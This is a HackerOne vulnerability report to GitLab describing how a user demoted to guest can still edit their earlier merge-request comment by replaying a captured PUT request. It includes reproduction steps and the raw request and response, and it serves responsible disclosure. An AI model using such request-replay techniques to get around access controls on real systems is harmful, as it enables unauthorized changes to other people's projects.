Guest Users can re-edit their comments on Merge Requests which they no longer have access to

HackerOne report #1212288 by cradlr on 2021-05-28, assigned to GitLab Team:

Report | Attachments | How To Reproduce

Report

Summary

A guest user can re-edit their comments in the Merge Request comment section when they no-longer have access to that Merge Request as a guest user.

We can fix this issue following the normal flow instead of the security flow, see #332646 (comment 592596619).

Steps to reproduce

1. I have used Firefox containers to gave multiple sessions in 1 browser. Create 2 user accounts in gitlab.com.
2. From the main owner's account create a project -> create a Group. Invite a member to that Group with the privileges of owner.
3. Create a project form the main owner's account under the group which has shared owner privileges.
4. Switch to the invited user's session and Create an issue->Create a Merge Request.->Then add the file.
5. Now comment on the Merge Request from the main owner's account and put a reply to that comment form the invited user's account.
6. Re-edit the response made by the invited user and push that request to repeater.
7. Change the permissions of the invited user's account to guest and assign that particular merge request to the main owner from the main owner's account.
8. Refresh the session of the invited user's account. 404 error message shows up.
9. Switch to repeater and edit the response and fire the request. We get a 500 Server error message.
10. Verify the changes from the main owner's account.

====================PUT REQUEST===========================  
PUT /test-groups2/owner-subgroup/inherited/notes/588153581 HTTP/1.1  
Host: gitlab.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0  
Accept: application/json, text/plain, */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://gitlab.com/test-groups2/owner-subgroup/inherited/-/merge_requests/15  
X-CSRF-Token: REDACTED
X-Requested-With: XMLHttpRequest  
Content-Type: application/json;charset=utf-8  
Content-Length: 96  
Origin: https://gitlab.com  
Connection: close  
Cookie: REDACTED

{"target_type":"merge_request","target_id":101955619,"note":{"note":"hola. !rrrrrrrrrrrrrrrrr"}}

======================Response================================================  
HTTP/1.1 500 Internal Server Error  
Date: Fri, 28 May 2021 21:24:40 GMT  
Content-Type: text/html; charset=utf-8  
Content-Length: 2926  
Connection: close  
Cache-Control: no-cache, no-store, max-age=0, must-revalidate  
Expires: Fri, 01 Jan 1990 00:00:00 GMT  
Pragma: no-cache  
X-Request-Id: 01F6TDTTP0E8VFGAW32MFJX5QX  
X-Runtime: 0.305979  
GitLab-LB: fe-06-lb-gprd  
GitLab-SV: web-33-sv-gprd  
CF-Cache-Status: DYNAMIC  
cf-request-id: 0a5676826400004e68cabbd000000001  
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"  
Strict-Transport-Security: max-age=31536000  
X-Content-Type-Options: nosniff  
Server: cloudflare  
CF-RAY: 656a8d170d744e68-FRA  
==========================================================================

Thanks,
Cradlr

Impact

Improper authorization leads to the re-edit of the comment for a guest user.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

• Priv-Escalation-comments-Merge-Requests.mp4